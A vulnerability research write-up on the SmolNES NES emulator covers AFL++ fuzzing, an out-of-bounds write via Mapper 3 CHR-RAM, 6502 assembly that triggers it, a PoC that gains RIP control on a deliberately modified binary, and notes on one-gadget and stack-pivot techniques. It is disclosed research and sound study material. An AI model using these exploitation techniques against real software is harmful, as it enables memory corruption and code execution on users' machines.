Blog

Vulnerability Research on SmolNES

Apr 3, 2026

Vulnerability Research on SmolNES

Executive summary

The SmolNES emulator contains multiple memory safety vulnerabilities, including an Out-Of-Bounds Write via Mapper 3 (CHR-RAM) that leads to arbitrary memory corruption when loading a malicious ROM.

In practice, only availability is definitively impacted: a malicious ROM can trigger a reproducible crash. In SmolNES’s memory layout, the GOT and the heap are out of reach, and no exploitable function pointer exists within the range reachable by the overflow.

That said, it makes for an excellent case study, directly transferable to more critical targets with a favorable memory layout: section 9 demonstrates RIP control in a modified binary built to simulate that scenario.

Background and target selection
Setting up the fuzzing environment
First results: initial crashes
Lead 1: OOB Read in PRG-ROM (abandoned)
Source code analysis
Fuzzing iterations and optimizations
Discovering the real vulnerability
Memory mapping and exploitation attempt
PoC on modified binary: RIP control
Responsible Disclosure and CVE
Appendix: Required NES concepts
Resources

1. Background and target selection

Why SmolNES?

SmolNES GitHub page, 776 stars and 3 contributors

The source code is available on GitHub (binji/smolnes).

SmolNES is a NES (Nintendo Entertainment System) emulator written in roughly 700 lines of “golf” C in deobfuscated.c (intentionally compact code). A few characteristics make it an ideal target:

Trivially AFL-fuzzable interface: the program takes a single .nes ROM as its argument (./smolnes <rom.nes>). It’s enough to feed AFL++ with binary files, then pass the generated files directly into smolnes.
Small codebase: the developer explicitly prioritized compactness (the tagline is “NES emulator in <5000 bytes of C”), which almost certainly means bounds checking was skipped.
Hidden complexity: the NES is a complex machine (6502 CPU, PPU, Mapper system). It would be surprising if a project like this, with no security focus, had no bugs.
Few maintainers: the project has only 3 contributors, it’s unlikely any vulnerability research has been done on it before.

The main attack surface identified right away is the iNES file header (the first 16 bytes of a ROM), which configures critical parameters such as memory bank sizes, mapper type, and graphics mode.

2. Setting up the fuzzing environment

Preparing the binary

The SmolNES source includes two versions:

smolnes.c: the official “golfed” version (unreadable)
deobfuscated.c: a readable version with explanatory comments, this is the one I used for research

Two modifications are made to deobfuscated.c before compiling for fuzzing:

Removing SDL calls (Simple DirectMedia Layer, the graphics/audio library): SDL initialization, window creation, rendering, and event polling are commented out. Without this, the program would try to open a window on every execution, making fuzzing too slow to be viable.
Capping the CPU cycle count: a limit is added to the main loop. Without this, a valid ROM would run the emulator forever.

Compiling with AFL++

The instrumented binary is compiled using the environment variables from the provided Makefile:

CC=afl-clang-lto make

afl-clang-lto (Link-Time Optimization) is AFL++‘s highest-performance compiler mode: it inserts instrumentation at link time, yielding better coverage and throughput than afl-cc or afl-clang-fast.

Seed corpus

Free-to-use NES ROMs from the EmuDeck homebrew repository are used as the initial corpus. AFL++ will mutate them automatically to explore new execution paths.

Initial run

afl-fuzz -i games/ -o output_dir/ -- ./smolnes_instru/deobfuscated @@

AFL++ TUI iteration 1: exec speed ~1500/sec, stability 100%, first crashes

The metrics are promising:

~1500 execs/sec: removing SDL was a success
stability 100%: the emulator is deterministic, which is essential for effective fuzzing

3. First results: initial crashes

AFL++ finds its first crashes quickly. Within minutes, 3 unique crash files are saved in output_dir/default/crashes/. After this initial burst, no new unique crashes appear despite dozens of additional minutes of fuzzing.

sig:11 (SIGSEGV) is present on all crashes, indicating an invalid memory access.

4. Lead 1: OOB Read in PRG-ROM (abandoned)

The first crash is loaded into GDB for analysis.

GDB crash OOB Read: fatal instruction movzx, $rax=0x3ffffc

→ movzx  r15d, BYTE PTR [rax+rcx*1+0x10]
; deobfuscated.c:234 : return rom[(prg[hi - 8 >> prgbits - 12] & ...) << prgbits | ...]
; mem(lo=0xfc, hi=0xf, val=0x0, write=0x0), reason: SIGSEGV

This corresponds to the following code:

// deobfuscated.c
return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
               << prgbits |
           addr & (1 << prgbits) - 1];

The emulator attempts to read at index 4,194,300 in rom[], a buffer with a maximum size of 1 MB: this is an Out-Of-Bounds Read.

Root cause: rombuf[4] (5th byte of the iNES header, number of PRG banks) was set to 0x00 by AFL. The emulator then initializes:

prg[1] = rombuf[4] - 1;
// If rombuf[4] == 0 : 0 - 1 = 255 (unsigned underflow)

The PRG-ROM read computation becomes prg[1] * 0x4000 + offset = 255 * 0x4000 + 0x3FFC = 0x3FFFFC, which is exactly the $rax value observed.

Why this lead is abandoned: this crash happens at the very start of execution, during the Reset Vector read (the game’s first instruction). It causes an immediate crash (DoS), but there is no control over the value read or the target address. Additionally, this bug blocks AFL: nearly every mutation generates this same immediate crash, the emulator never actually starts, and AFL cannot explore the deeper execution paths that are of interest.

5. Source code analysis

Before optimizing the fuzzer, it’s necessary to understand the code in order to target the right execution paths. This is a good moment to read the appendix covering the NES architectural concepts, as things get fairly dense from here.

Overview of deobfuscated.c

The code is built around a single large main function that contains the emulator’s main loop, plus a few helper functions.

Initialization: header parsing

// deobfuscated.c
SDL_RWread(SDL_RWFromFile(argv[1], "rb"), rombuf, 1024 * 1024, 1);
// The full ROM file is loaded into rombuf[1024*1024]

rom = rombuf + 16;        // Game code starts after the 16-byte header
prg[1] = rombuf[4] - 1;  // Index of the last PRG bank (header byte 4)

// Header byte 5: number of CHR-ROM banks in the file
// If 0: the game has no CHR-ROM, it uses CHR-RAM (8 KB of RAM)

//                                             v--- CHR-RAM mode: chrrom = chrram[8192]
chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//                   ^--- CHR-ROM mode: chrrom points into the file

chrrom is the base pointer for graphics data access. Its value (either pointing into the ROM file or into chrram) is the pivot of the vulnerability.

The `get_chr_byte()` function

// deobfuscated.c
uint8_t *get_chr_byte(uint16_t a) {
  return &chrrom[chr[a >> chrbits] << chrbits | a % (1 << chrbits)];
}

The parameter a is a 14-bit VRAM address (value between 0 and 16383), representing a position in the PPU’s graphics address space. The variable V plays this role during an access from $2007.

The formula is compact. To understand it, note that a >> chrbits (with chrbits=12) extracts the most significant bit of a on 13 bits, which encodes the bank number. In standard CHR-RAM mode, a is bounded to $0000-$1FFF (8192 values) before the call: a >> 12 can therefore only be 0 or 1, selecting one of the two 4 KB banks. It’s chr[bank_index] that can exceed 1 (the heart of the vulnerability). The << chrbits shift reconstructs the bank base address, and the modulo recovers the intra-bank offset:

// Equivalent readable version (with chrbits = 12, bank size = 4096 bytes):
uint8_t *get_chr_byte_readable(uint16_t a) {
  uint8_t  bank_index = chr[a >> 12];          // bits 12-15 of 'a' -> bank number
  uint32_t bank_base  = bank_index << 12;      // bank_index * 4096
  uint16_t offset     = a & 0xFFF;            // bits 0-11 of 'a' -> offset within bank
  return &chrrom[bank_base + offset];
}

chr[] is an array of graphics bank indices, updated by the Mappers. In CHR-RAM mode, chrrom == chrram and chrram is only 8192 bytes (2 banks of 4096). If bank_index >= 2, then bank_base >= 8192, and the returned pointer goes past the end of chrram.

The central `mem()` function

mem() emulates all 6502 CPU memory accesses. It takes the address (hi:lo), the value to write (val), and the operation direction (write).

// deobfuscated.c (excerpt)
uint8_t mem(uint8_t lo, uint8_t hi, uint8_t val, uint8_t write) {
  uint16_t addr = hi << 8 | lo;

  switch (hi >>= 4) {  // Divide hi by 16 to get the memory "region"

  case 0: case 1: // Region $0000-$1FFF: internal RAM (2 KB, mirrored over 8 KB)
    // The NES physically has only 2 KB of RAM ($0000-$07FF). The remaining 6 KB
    // ($0800-$1FFF) are mirrors: accessing $0800 or $0000 reads the same physical byte.
    return write ? ram[addr] = val : ram[addr];

  case 2: case 3: // Region $2000-$3FFF: PPU registers (mirrored)
    // The 8 PPU registers ($2000-$2007) are mirrored across the entire $2000-$3FFF range.
    // lo &= 7 keeps only the 3 low bits, mapping any address in this range to its
    // corresponding PPU register.
    // Ex: $2015 -> 0x15 & 7 = 5 -> register $2005 (ppuscroll).
    lo &= 7;

    if (lo == 7) { // Register $2007 = PPUDATA (PPU data port)
      // The PPU has a one-cycle read delay: reading $2007 does not immediately return
      // the value at address V, but the value from the previous cycle, stored in ppubuf.
      // The current read is buffered for the next access.
      // Exception: the palette ($3F00+) is returned without buffering.
      // That's why tmp = ppubuf at the start and return tmp at the end.
      tmp = ppubuf;
      uint8_t *rom =
          // If V points into the Pattern Table area (0x0000-0x1FFF):
          V < 8192  ? write && chrrom != chrram
                          ? &tmp              // Write to CHR-ROM: ignore
                                              // (tmp serves as a bit bucket; CHR-ROM
                                              // is read-only on real hardware)
                          : get_chr_byte(V)   // Write to CHR-RAM or any read
          // If V points into the Nametable area (0x2000-0x3EFF):
          : V < 16128 ? get_nametable_byte(V)
          // Otherwise: Palette area (0x3F00+)
                      : palette_ram + (uint8_t)((V & 19) == 16 ? V ^ 16 : V);
      write ? *rom = val : (ppubuf = *rom); // Actual write or read
      V += ppuctrl & 4 ? 32 : 1;  // V auto-increments after each $2007 access
      V %= 16384;  // V stays within the PPU address space (14 bits = 2^14 = 16384)
      return tmp;
    }
    // ... handling of other PPU registers ($2000 ppuctrl, $2006 ppuaddr, etc.)

  case 4: // Region $4000-$4FFF: APU and I/O registers
    // $4016: joypad read (keyboard state in the emulator)
    for (tmp = 0, hi = 8; hi--;)
      tmp = tmp * 2 + key_state[...]; // key_state = pointer to keyboard state

  case 6: case 7: // Region $6000-$7FFF: PRG-RAM (optional cartridge RAM)
    // Two distinct memories, two distinct roles:
    // - Internal RAM ($0000-$1FFF): 2 KB soldered on the motherboard. Game variables,
    //   6502 stack. Present on every NES.
    // - PRG-RAM ($6000-$7FFF): optional 8 KB ON the cartridge. Absent from most games.
    //   When present, often battery-backed to save progress (Zelda, Metroid).
    addr &= 8191; // Keep the 13 low bits (0x1FFF) to address prgram[8192]
    return write ? prgram[addr] = val : prgram[addr];

  default: // Region $8000-$FFFF: ROM + Mapper handling
    // IMPORTANT: writes to the ROM region do not modify the ROM.
    // They are intercepted and interpreted as commands to the Mapper.
    if (write)
      switch (rombuf[6] >> 4) { // Mapper number
      case 7: // Mapper 7 (AxROM)
        // ...
      case 4: // Mapper 4 (MMC3)
        // ...
      case 3: // Mapper 3 (CNROM): CHR bank switching only
        chr[0] = val % 4 * 2; // Even bank (0, 2, 4, or 6)
        chr[1] = chr[0] + 1;  // Next odd bank (1, 3, 5, or 7)
        break;
      case 2: // Mapper 2 (UNROM)
        // ...
      case 1: // Mapper 1 (MMC1)
        // ...
      }
    return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
                   << prgbits |
               addr & (1 << prgbits) - 1];
  }
  return ~0;
}

Key points identified for the vulnerability:

Register $2007 (PPUDATA): this is the PPU’s data port. Writing to $2007 from 6502 code triggers a VRAM write, whose destination is computed by get_chr_byte(V). V is the PPU’s internal address cursor, controlled by writes to $2006 (PPUADDR).
Mapper 3: any write anywhere in $8000-$FFFF modifies chr[0] without bounds checking. With val=0x01 (or any val such that val % 4 == 1), chr[0] = 0x01 % 4 * 2 = 2.
The partial safety check: write && chrrom != chrram ? &tmp : get_chr_byte(V). If chrrom == chrram (CHR-RAM mode), the write goes through get_chr_byte with no bounds check on the bank index. This is the only case where a write can go out of bounds.

6. Fuzzing iterations and optimizations

Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

The first harness version simply removes SDL graphics calls and adds a cycle limit. AFL++ quickly finds 3 unique crashes (all related to the OOB Read in PRG-ROM described in section 4), then stalls.

Reason for the stall: the emulator crashes too early. When rombuf[4]=0, the NES CPU never really starts: it reads an invalid Reset Vector and immediately tries to access 4 MB of PRG-ROM. AFL cannot explore the deeper execution paths (like the 6502 code that writes to $2007).

Iteration 2: header patches + ASAN + 6502 dictionary

Knowing the code better, several additional modifications are made.

Header patches in the harness (applied after reading the file):

// Prevent PRG underflow and the immediate $FFFC crash
if (rombuf[4] == 0 || rombuf[4] > 64) rombuf[4] = 1;
// Force CHR-RAM mode: chrrom = chrram, which activates the path through get_chr_byte()
rombuf[5] = 0;
// Force Mapper 3 (CNROM), preserve the mirroring bit
rombuf[6] = (rombuf[6] & 0x01) | 0x30;

These three patches steer AFL toward the vulnerable path:

rombuf[4] clamped: prevents the immediate PRG crash
rombuf[5] = 0: ensures chrrom == chrram, a necessary condition for the OOB Write
rombuf[6] = 0x3X: forces Mapper 3, enabling CHR bank switching without bounds checking

Note on rombuf[4] > 64: the value is capped at 64 banks maximum. This limit exactly matches the rombuf buffer size (1 MB / 16 KB per bank = 64 banks). Beyond that, index calculations would exceed the allocated megabyte. This is not an official NES limit (real NES ROMs have at most 32 PRG banks), it’s a safety bound derived from the buffer size.

Compiling with ASAN:

AFL_USE_ASAN=1 CC=afl-clang-lto make

Without ASAN, an OOB Write will silently write into adjacent memory without an immediate crash if the overwritten region contains data the process can read. ASAN detects the out-of-bounds access at the very first overflowed byte, making the crash systematic.

The trade-off is a performance drop: ~300 execs/sec instead of ~1500. Further optimizations could improve this, but it wasn’t necessary given that enough crashes were found at this reduced speed.

AFL++ dictionary (nes6502.dict):

# iNES header
magic="NES\x1a"
mapper3="\x30"

# 6502 write opcodes
op_sta_abs="\x8D"
op_stx_abs="\x8E"

# NES register addresses
ppu_addr="\x06\x20"   # $2006: PPUADDR
ppu_data="\x07\x20"   # $2007: PPUDATA
mapper_reg="\x00\x80" # $8000: Mapper 3 register

#...
# The actual dictionary I used was considerably larger

Without the dictionary, AFL has to stumble upon the sequence 8D 07 20 (STA $2007) by chance among 16,777,216 possible 3-byte combinations. With the dictionary, it inserts it directly.

Surface bug hotfixes:

Two additional bugs were identified and hotfixed in the harness to let ASAN reach the target bug:

OOB Write in palette_ram: the index (uint8_t)(...) can be up to 255, but palette_ram is only 64 bytes. Hotfix: & 63 to clamp the index.
OOB Read in PRG-ROM: the computed index in the PRG formula can exceed 1 MB. Hotfix: add a bounds check before the return.

Both bugs are real (confirmed on legitimate, unmodified ROMs), but of lesser interest: the first is a write with a limited range (~191 bytes maximum), the second is a read with no control over the value returned.

Result: AFL++ finds the CHR-RAM OOB Write crash very quickly.

AFL++ TUI iteration 2: CHR-RAM OOB Write crash found with ASAN + dictionary + header patches

7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

The ASAN crash

With the patched binary (ASAN + forced Mapper 3 + forced CHR-RAM), AFL++ produces a new type of crash. Replayed under GDB with ASAN, it reveals:

ASAN: global-buffer-overflow WRITE 0 bytes after chrram

==ERROR: AddressSanitizer: global-buffer-overflow
WRITE of size 1 at 0x55555628c9a0 thread T0
    #0 in mem deobfuscated.c:92
0x55555628c9a0 is located 0 bytes after global variable 'chrram' (size 8192)

Unlike the previous crashes (READ), this one is a WRITE. It lands exactly at chrram[8192], the first byte past the end of the array.

The stack trace (#0) points to line 92 of mem():

write ? *rom = val : (ppubuf = *rom);  // line 92

Here, rom is the pointer returned by get_chr_byte(V), whose value has gone past the bounds of chrram. ASAN interrupts execution at the exact moment of the write.

Root cause: `get_chr_byte()` without bounds checking

In CHR-RAM mode (chrrom == chrram, from rombuf[5] = 0) with Mapper 3 active (rombuf[6] >> 4 == 3), any CPU write to $8000-$FFFF modifies the CHR banks:

case 3: // mapper 3
    chr[0] = val % 4 * 2;
    chr[1] = chr[0] + 1;
    break;

val is entirely controlled by the ROM. The possible values of chr[0] and their consequences:

val written	chr[0]	base offset into chrram	out-of-bounds?	OOB range
val%4 = 0	0	0	no	-
val%4 = 1	2	8192	yes	+4095 B
val%4 = 2	4	16384	yes	+12287 B
val%4 = 3	6	24576	yes	+20479 B

There is no check that chr[0] stays within the physical bounds of chrram.

Trigger conditions

Three conditions, all satisfiable by a malicious ROM:

rombuf[5] == 0 (iNES header byte 5, controlled by the ROM): enables CHR-RAM mode
rombuf[6] >> 4 == 3 (high nibble of header byte 6, controlled by the ROM): enables Mapper 3
The PPU writes via $2007 with V in $0000-$1FFF after a Mapper write that set chr[0] >= 2

Write address control

The target address is fully derivable from two controllable parameters:

address = &chrram[ chr[V >> 12] * 4096 + (V & 0xFFF) ]

val written to $8000+: determines chr[0] (0, 2, 4, or 6)
V: positioned by two consecutive writes to $2006

Granularity is one byte. The written value (from the 6502’s A, X, or Y register) is also controlled by the ROM.

Demonstration: minimal 6502 assembly

The following sequence triggers an OOB Write at the first byte after chrram. iNES header: 1 PRG bank (rombuf[4] = 1), 0 CHR banks (rombuf[5] = 0), Mapper 3 (rombuf[6] = 0x30).

; Entry point (Reset Vector at $FFFC points here)

; Step 1: select the CHR bank via Mapper 3
; val=1 => chr[0] = 1%4*2 = 2 => base offset = 2*4096 = 8192 (first OOB byte)
LDA #$01         ; $A9 $01
STA $8000        ; $8D $00 $80 -> Mapper 3: chr[0]=2, chr[1]=3

; Step 2: set V via two consecutive writes to $2006
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (high byte: $00)
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (low byte: $00) => V = $0000

; Step 3: write via $2007 (PPUDATA)
; get_chr_byte($0000) = &chrram[2*4096 + 0] = &chrram[8192] -> OOB
LDA #$41         ; $A9 $41  (value to write)
STA $2007        ; $8D $07 $20 -> WRITE to chrram[8192]

To target a different offset:

target (offset from start of chrram)	val at $8000	V via $2006
8192 + N (N < 4096)	$01 (chr[0]=2)	$0000-$0FFF
16384 + N (N < 4096)	$02 (chr[0]=4)	$0000-$0FFF
24576 + N (N < 4096)	$03 (chr[0]=6)	$0000-$0FFF

8. Memory mapping and exploitation attempt

.bss section layout

GDB: addresses of global variables in the .bss section

The order of global variables in memory (.bss section, confirmed via GDB on the release binary):

0x55555567a220  chrram      [8192 bytes]  <- start of the overflow region
0x55555567c220  ram         [8192 bytes]
0x55555567e220  palette_ram [64 bytes]
0x55555567e260  vram        [2048 bytes]
0x55555567ea60  ptb_lo      [1 byte]
0x55555567ea70  addr_lo     [1 byte]
0x55555567ea80  prg         [4 bytes]
0x55555567ea90  rom         [8 bytes]  (pointer)
...

Maximum overflow range with Mapper 3: chr[0] max = 6, range = 6 * 4096 + 4095 = 28671 bytes beyond the start of chrram, i.e. ~20 KB out-of-bounds.

The GOT is out of reach

The natural first target for an OOB Write is the GOT (Global Offset Table), which holds the addresses of libc functions. Overwriting a GOT entry redirects a function call to arbitrary code.

GDB: GOT located before the .bss section, out of reach

gef➤  p/d 0x555555559fc0 - 0x55555567a220 # GOT - chrram
$5 = -1180256   # Negative value (~-1.1 MB)

The GOT is located approximately 1.1 MB before chrram in memory. Since the OOB Write can only reach addresses at positive offsets from chrram, the GOT is inaccessible.

The heap is out of reach

The heap (dynamically allocated by SDL at startup) is another potential target: it may contain function pointers or exploitable allocator metadata.

Distance chrram -> heap start: 0x23e749f0 ~ 574 MB

As expected, ASLR places the heap several hundred megabytes away from the .bss section. The maximum OOB range (~20 KB with Mapper 3) is nowhere near that distance.

Analysis of variables within range

In the ~20 KB reachable after chrram, the variables present are integer arrays (ram, palette_ram, vram) and scalars (ptb_lo, addr_lo, 6502 registers, prg). Overwriting them disrupts emulation but provides no useful primitive: no function pointer is present in this region.

One variable stands out, though: the pointer *rom, located ~18 KB after chrram. It points to the start of the PRG data inside rombuf and is used for offset calculations. Overwriting it would change the base for address arithmetic, potentially enabling access to arbitrary memory, but it would also alter where instructions are read from. This primitive self-destructs upon use.

Impact assessment

Guaranteed DoS: reproducible crash with a malicious .nes ROM, confirmed via ASAN
Memory corruption: up to ~20 KB of global variables can be overwritten, disrupting emulation arbitrarily
Direct RCE: not achievable with this memory layout (GOT and heap out of reach, no function pointer in the reachable region)

9. PoC on modified binary: RIP control

SmolNES’s memory layout contains no function pointer within the overflow’s reach. To illustrate the vulnerability’s potential in a favorable scenario, a function pointer is manually added to deobfuscated.c’s source, in the .bss section immediately after chrram. This pointer does not exist in the original binary. A malicious ROM overwrites it with 0xdeadbeef, giving control of RIP (the instruction pointer register on x86_64) on the next call.

Code modification

The modification spans three files. The function pointer is declared in a separate compilation unit (poc_hook.c) to ensure the linker places its .bss after that of deobfuscated.o, and therefore at a higher address than chrram.

poc_hook.h:

typedef void (*render_hook_t)(void);
extern render_hook_t render_hook;

poc_hook.c:

typedef void (*render_hook_t)(void);
render_hook_t render_hook;

Full diff:

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -18,8 +18,8 @@
-deobfuscated: deobfuscated.c
-       $(CC) -O2 -o $@ $< ${SDLFLAGS} -g ${WARN}
+deobfuscated: deobfuscated.c poc_hook.c
+       $(CC) -O2 -o $@ deobfuscated.c poc_hook.c ${SDLFLAGS} -g ${WARN}

diff --git a/deobfuscated.c b/deobfuscated.c
--- a/deobfuscated.c
+++ b/deobfuscated.c
@@ -1,5 +1,6 @@
 #include <SDL2/SDL.h>
 #include <stdint.h>
+#include "poc_hook.h"

@@ -691,6 +691,8 @@
         SDL_RenderPresent(renderer);
+        // [POC] Call render hook if defined
+        if (render_hook) render_hook();
         // Handle SDL events.

Two points to note:

Makefile: poc_hook.c is added as an explicit source. The linker places poc_hook.o’s .bss after deobfuscated.o’s, guaranteeing that render_hook ends up at an address higher than all variables in deobfuscated.c, including chrram.
Call site: the hook is called after each SDL_RenderPresent, i.e. once per frame (scanline 241). That’s the natural moment for an emulator to expose this kind of callback.

This pattern is realistic: many emulators expose such callbacks for debugging tools, save states, or GUI frontends.

Malicious ROM

The ROM is generated by the make_poc_rom.py script (see Resources). It takes the offset of render_hook from chrram in the target binary’s .bss, then writes the 8 bytes of 0xdeadbeef via successive writes to $2007, incrementing V by 1 each time (auto-increment after each PPUDATA access).

Result

RIP is controlled. The emulator jumped to the address supplied by the malicious ROM.

Toward a full exploit

Controlling RIP is not enough to execute arbitrary code on a modern system: ASLR and the NX bit are highly effective mitigations.

Two classic approaches to go further:

Option 1: One-gadget

A “one-gadget” is a gadget in libc that, when called, executes execve("/bin/sh", NULL, NULL) if certain register conditions are met. Pointing render_hook at this gadget would yield a shell without a ROP chain, given a libc address leak is available to bypass ASLR. In a real-world context, the end goal is usually not a local shell but persistence or remote access; the one-gadget remains a valid tool, it’s the post-exploitation action that changes.

Option 2: Stack pivot into rombuf

The real alternative is a stack pivot: find a gadget that places rsp (the stack pointer) into a memory region whose contents we control. rombuf is a 1 MB array (fully controlled by the malicious ROM) located in .bss. A gadget of the form mov rsp, [address_in_bss] ; ret would pivot the stack into rombuf and allow executing an arbitrary ROP chain, leading to code execution. This scenario is reinforced by the fact that rom is a global pointer (in .bss) that already points into rombuf: a gadget dereferencing this known address is enough to place rsp in the controlled region.

10. Responsible Disclosure and CVE

Reporting to the maintainer

The vulnerabilities described in this write-up were reported to the project’s maintainer (binji/smolnes) by email before this article was published. His response, unsurprisingly for a code golf project, was that he “wasn’t too worried about OOB in smolnes”. He authorized me to publish this write-up.

Why no CVE was requested

These vulnerabilities technically meet the criteria for CVE assignment: they are reproducible, documented, and the impact (guaranteed DoS, memory corruption) is real.

However, filing a CVE would have been counterproductive in this case. SmolNES is a hobby code golf project with 3 contributors, designed as a compactness exercise and not intended for production deployment. There is no proven critical exploitation path in the binary as distributed (the GOT and heap are out of reach, no function pointer exists in the reachable region).

Given the nature of the project and the absence of a critical exploitation path, I decided not to pollute the ecosystem with a pointless CVE.

This aligns with what this article describes well: CVSS scores are calculated for the worst-case deployment scenario, regardless of actual context. The author himself acknowledges that some CVEs “have no viable exploitation path or deployment, and frankly waste everyone’s time.” A hobby NES emulator is the perfect example.

11. Appendix: Required NES concepts

This appendix covers the NES architectural concepts required to understand the vulnerability.

A. NES general architecture

The NES (Nintendo Entertainment System, 1983) is made up of three main components:

CPU: a Ricoh 2A03, derived from the MOS Technology 6502. 8-bit processor, 16-bit address bus (64 KB address space).
PPU (Picture Processing Unit): the Ricoh 2C02, handles display. It has its own 16 KB address space, separate from the CPU’s.
APU (Audio Processing Unit): integrated into the CPU, handles sound (5 channels).

The game is stored on a cartridge containing two types of memory:

PRG-ROM: the game code and program data (read by the CPU via $8000-$FFFF)
CHR-ROM or CHR-RAM: the graphics data (tiles, sprites), accessed by the PPU

B. The 6502 CPU and its address space

The CPU addresses 64 KB (0x0000 to 0xFFFF), broken down as follows:

$0000 - $07FF : Internal RAM (2 KB, mirrored over $0000-$1FFF)
$2000 - $2007 : PPU registers (mirrored across the entire $2000-$3FFF range)
$4000 - $4017 : APU and I/O registers (joypads, DMA)
$6000 - $7FFF : PRG-RAM (optional cartridge RAM)
$8000 - $FFFF : PRG-ROM (game code) + Mapper registers

The Reset Vector: when the NES powers on, the CPU reads the two bytes at $FFFC-$FFFD and jumps to the address they contain. That’s the game’s entry point.

6502 instructions relevant to the vulnerability:

LDA #val (opcode A9): loads an immediate value into accumulator A
STA $addr (opcode 8D + 2 little-endian bytes): writes A to absolute memory
INC $addr,X (opcode FE + 2 bytes): reads, increments, and writes back the memory value (Read-Modify-Write)

prg[] and memory windows:

prg is an array whose elements contain the number of a PRG bank currently mapped into CPU memory. A PRG bank is 16 KB. Example:

prg[0] = 2;  // the $8000-$BFFF range points to bank 2 of the ROM
prg[1] = 5;  // the $C000-$FFFF range points to bank 5 of the ROM

C. The PPU and VRAM

The PPU manages the display through its own 16 KB address space:

$0000 - $1FFF : Pattern Tables (CHR: 8x8 pixel tiles, 2 banks of 4 KB)
$2000 - $3EFF : Nametables (screen map)
$3F00 - $3FFF : Palette RAM (32 active colors)

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

The CPU cannot directly access VRAM. It communicates with the PPU through memory-mapped registers in the $2000-$2007 range:

$2006 (PPUADDR): sets the target address in VRAM via two consecutive writes (toggle controlled by bit W):

First write  -> high byte of the address (stored in T, temporary register)
Second write -> low byte + copy of T into V (V = active address)

case 6: // $2006 PPUADDR
    T = (W ^= 1)
      ? T & 0xff | val % 64 << 8   // 1st write: bits 8-13 of T
      : (V = T & ~0xff | val);     // 2nd write: bits 0-7 of T, then V = T

$2007 (PPUDATA): reads or writes one byte at the address pointed to by V. After each access, V auto-increments:

V += ppuctrl & 4 ? 32 : 1;
V %= 16384;  // 16384 = 2^14: the PPU space is 14 bits wide (0 to 16383)

This auto-increment mechanism allows writing consecutive byte sequences to VRAM with only repeated STA $2007 instructions.

D. Mappers

The NES only has 32 KB for PRG-ROM and 8 KB for CHR. But some games need much more (Super Mario Bros 3: 384 KB of PRG).

The solution: Mappers, extra chips inside the cartridge that enable bank switching. The CPU always sees the same addresses ($8000-$FFFF), but the Mapper can connect different chunks of the ROM to those addresses.

How the game controls the Mapper: writes to the ROM region ($8000-$FFFF) do not modify the ROM (read-only). This behavior is repurposed: writes are intercepted and interpreted as bank switching commands. This is Memory-Mapped I/O (MMIO).

In SmolNES, the Mapper number is encoded in bits 4-7 of iNES header byte 6 (rombuf[6] >> 4).

E. CHR-ROM vs CHR-RAM

CHR-ROM: most games store their graphics in a dedicated ROM chip on the cartridge. Graphics are fixed. chrrom points into the ROM file buffer.

CHR-RAM: some games (such as Zelda II, Metroid) have no graphics chip. They use the NES’s internal RAM (8 KB), which allows them to modify their graphics dynamically. chrrom then points to chrram[8192].

In SmolNES, header byte 5 (rombuf[5]) determines the mode:

chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//       ^if != 0: CHR-ROM from the file       ^if 0: CHR-RAM (static 8 KB)

This distinction is at the heart of the vulnerability: Mappers allow selecting among multiple CHR banks. In CHR-ROM mode, having multiple banks is normal : the ROM file can contain many. But in CHR-RAM mode, there are only 2 physical banks (0 and 1, i.e. 8 KB). Selecting bank 2 goes past the end of chrram[8192].

F. Mapper 3 (CNROM)

Mapper 3, also known as CNROM, is one of the simplest. It only manages the CHR bank. Any write to $8000-$FFFF changes the active graphics bank:

case 3: // mapper 3 (CNROM)
    chr[0] = val % 4 * 2;   // val % 4 gives 0, 1, 2, or 3; * 2 gives 0, 2, 4, or 6
    chr[1] = chr[0] + 1;    // Next bank: 1, 3, 5, or 7
    break;

// CHR bank is selected in pairs (two 4 KB sub-banks)
// Bank 0: chr[0]=0, chr[1]=1  (offsets 0 and 4096 into chrram -> valid)
// Bank 1: chr[0]=2, chr[1]=3  (offsets 8192 and 12288          -> OVERFLOW if CHR-RAM)
// Bank 2: chr[0]=4, chr[1]=5  (offsets 16384 and 20480         -> even further)
// Bank 3: chr[0]=6, chr[1]=7  (offsets 24576 and 28672         -> maximum range)

In CHR-ROM mode, all these offsets are valid. In CHR-RAM mode, only offsets 0 and 4096 (bank 0) are valid.

G. The iNES file format

A .nes file begins with a 16-byte header:

Offset  Size  Description
0       4     "NES\x1A" (magic number)
4       1     Number of PRG-ROM banks (16 KB each)
5       1     Number of CHR-ROM banks (8 KB each). 0 = CHR-RAM mode
6       1     Flags:
                bit 0    : mirroring (0=horizontal, 1=vertical)
                bit 1    : battery (persistent PRG-RAM)
                bit 2    : trainer (512 bytes before PRG-ROM)
                bits 4-7 : low nibble of Mapper number
7       1     Flags:
                bits 4-7 : high nibble of Mapper number
8-15    8     Unused (base iNES format)

In SmolNES, these values are read from rombuf without validation and used directly to configure the emulator.

12. Resources

PoC script for modified binary

#!/usr/bin/env python3
"""
PoC ROM for smolnes: OOB Write via Mapper 3 CHR-RAM -> overwrite render_hook.

.bss layout (smolnes/deobfuscated binary compiled with poc_hook.c as second source):
  chrram      : offset 0       (8192 bytes)
  render_hook : offset 18552   (8 bytes, uint8_t*)

Parameters:
  - Mapper 3 active (rombuf[6] >> 4 == 3)
  - CHR-RAM mode (rombuf[5] == 0) => chrrom = chrram
  - val=2 written to $8000 => chr[0] = 2%4*2 = 4
  - V = 0x0878 (via two $2006 writes)
  - get_chr_byte(0x0878) = &chrram[chr[0]*4096 + 0x878] = &chrram[18552] = &render_hook

Target: write 0xDEADBEEF into render_hook (little-endian, 8 bytes).
Trigger: when scany==241, dot==1, smolnes calls render_hook() => SIGSEGV.
"""

TARGET_ADDR = 0xDEADBEEF

# ---- Parameter calculation ----
CHRRAM_SIZE   = 8192
HOOK_OFFSET   = 18552                # p/d (long)&render_hook - (long)&chrram
BANK_INDEX    = HOOK_OFFSET // 4096  # = 4 (chr[0] to reach)
